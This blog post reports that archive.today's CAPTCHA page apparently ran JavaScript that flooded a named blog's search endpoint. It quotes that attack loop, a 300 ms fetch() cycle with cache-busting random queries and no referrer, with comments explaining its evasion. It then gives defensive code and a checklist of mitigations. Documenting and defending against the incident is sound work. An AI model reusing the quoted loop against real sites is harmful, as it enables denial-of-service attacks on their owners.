A Blog Under Siege: archive.today Reportedly Directing a DDoS Attack

Incident & analysis


February 2026 · report & mitigation · tags: archive.today, DDoS, web-archives

Summary: Multiple reports show that archive.today’s CAPTCHA page executed client-side JavaScript that repeatedly requested a blog’s search endpoint, creating DDoS-like traffic for as long as the CAPTCHA page stayed open. The original write-up includes the code samples and screenshots used to validate the behavior.

What was observed

Observers found a short `setInterval` loop on the archive.today CAPTCHA page that issued `fetch()` requests to a target blog’s search URL every ~300 ms with randomized query strings — ensuring the requests bypassed any cache and imposed continuous load for as long as the page remained open. The code sample published in the report demonstrates the pattern:

// Runs for as long as the CAPTCHA page stays open: every 300 ms, hit the
// blog's search endpoint with a random base-36 query string, so each URL
// is unique and no cache layer can absorb the load.
setInterval(function() {
  fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
    referrerPolicy: "no-referrer",  // strip the referrer, hiding the requests' origin
    mode: "no-cors"                 // fire-and-forget; the opaque response is discarded
  });
}, 300);

The incident and the code sample were discussed on Hacker News and Reddit, where community members verified the behavior, debated its intent, and suggested mitigations.
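One lightweight way to verify behavior like this — a sketch, not necessarily the method the commenters used — is to wrap the global `fetch` before the suspect script runs, so every outgoing request is logged with a timestamp and the ~300 ms loop becomes visible immediately:

```javascript
// Sketch only: instrument the global fetch so each outgoing request is
// logged. Pasted into the browser console (or injected before page
// scripts run), this would surface a repeating request loop at once.
const realFetch = globalThis.fetch;
globalThis.fetch = function (...args) {
  console.log(new Date().toISOString(), "outgoing fetch:", String(args[0]));
  return realFetch.apply(this, args);
};
```

The same idea scales up to a DevTools network capture or a logging proxy; the console wrapper is just the fastest way to confirm the pattern on a single page.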

Timeline & reaction

  • Initial observation and public write-up by the blog owner (Gyrovague), documenting the code and the timeline.
  • Community threads on Hacker News and Reddit discussing verification, impact, and blocking approaches.
  • Some blocklists and adblock rules were updated to block these requests for users running content blockers (as reported in the original post).

Quick mitigation checklist (for site owners)

  • Implement rate limiting on search endpoints (return 429 after threshold) and consider short caching of generic unknown queries.
  • Use a Web Application Firewall (WAF) or CDN rules to detect repeated requests with random query-strings and mitigate/block them.
  • Log and capture sample request headers/time windows to support abuse reports or help blocklists.
  • Consider simple defenses against obviously random lookups — e.g., serve a cheap, static response for queries below a minimum length or for tokens that look machine-generated.
  • Notify your hosting provider and collect evidence (logs, timestamps, sample requests) if you suspect an external service is generating abusive traffic.
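The first and last checklist items can be sketched in a few lines of server-side JavaScript. Everything below is illustrative: `looksRandom` and `RateLimiter` are hypothetical names, and the thresholds are assumptions, not values from the report.

```javascript
// Heuristic: flag query strings that look like random tokens (short, no
// spaces, vowel-poor) so they can be answered with a cheap static page
// instead of a real search. Random base-36 strings rarely contain vowels.
function looksRandom(q) {
  if (q.length < 3) return true;            // too short to be a real search
  if (/\s/.test(q)) return false;           // real searches often contain spaces
  const vowels = (q.match(/[aeiou]/gi) || []).length;
  return vowels / q.length < 0.2;           // assumed threshold, tune per site
}

// Fixed-window rate limiter keyed by client IP: allow `limit` requests
// per `windowMs`, then the caller should answer 429 until the window resets.
class RateLimiter {
  constructor(limit, windowMs) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.hits = new Map();                  // ip -> { count, windowStart }
  }
  allow(ip, now = Date.now()) {
    const entry = this.hits.get(ip);
    if (!entry || now - entry.windowStart >= this.windowMs) {
      this.hits.set(ip, { count: 1, windowStart: now });
      return true;
    }
    entry.count += 1;
    return entry.count <= this.limit;
  }
}
```

At one request every ~300 ms, a single open CAPTCHA tab generates roughly 200 search requests per minute, so even a generous per-IP limit (say, 30 searches per minute) trips almost immediately while leaving ordinary readers unaffected.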



Publisher note: This post summarizes primary reporting and community discussion. See the original write-up for the screenshots, email timelines, and full code samples.
